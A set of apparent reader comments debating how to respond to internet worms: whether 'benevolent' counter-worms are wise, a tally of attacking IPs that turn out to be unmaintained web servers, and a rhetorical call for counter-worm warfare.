When someone writes a virus, they very often get it wrong. (Of course, this is just an extension of programmers making their usual mistakes.) As most people know, the Internet Worm had a bug which caused it to bring down machines but this wasn't actually what the author intended. Similarly many of the contemporary worms contain bugs which alter their impact from what their authors actually intended. Nonetheless, they are still very damaging -- sometimes more so due to these mistakes!
If people start writing "benevolent" worms to fix these problems, they very likely aren't going to get it right the first time. Or even the second. It's hard to debug this sort of code because it's hard to actually predict how it will perform out there on the great sprawling mass of today's hetergenous Internet. They will most likely release buggy code that will cause more damage than it will solve. Naturally this is just one problem and there are undoubtedly others but I hope people don't end up going down this path. At least until some official, well-thought out plan is established.
I collected a hundred different IP addresses that were attacking my machine. Then I went to each of those web servers and took a look. 90% of them were completely unpopulated.
Based on this statistic, I come to the conclusion that most of the problem lies with people that don't even realize they are running a web server. Perhaps when they installed NT they thought you needed to enable the web server in order to access the Internet. I don't know -- its hard to get into the minds of the clueless.
I further conclude that unless these people are proactively notified that they are the root of the problem, these servers will never get turned off or updated.
-Rick
The war on Worms will be like any war. We have a common ground, (The internet) being fought over by 2 sides, (hackers and normals). In every conflict up to this point in time, 2 sides have battled with equal technology, and the ultimate deciding factor has been sheer numbers and willpower. The Battleground has always ended up being desecrated and useless. However, over time, peace returns as the remainder of the enemy and all its traces are eradicated. This will be the case on the Internet. Our weapons will be counter-worms, and the battlefield will be the Internet. Sure, it may become despoiled and hard drives may be ruined, but that is a small price to pay seeing as every other war has left entire cities destroyed. As I said, the Internet may well be destroyed as we know it, but in its place a new Internet will form, with a better way of doing things, and peace will return as hackers are confined one by one. Let the battle begin.
"The difference between genius and stupidity is that genius has its limits."- -- Albert Einstein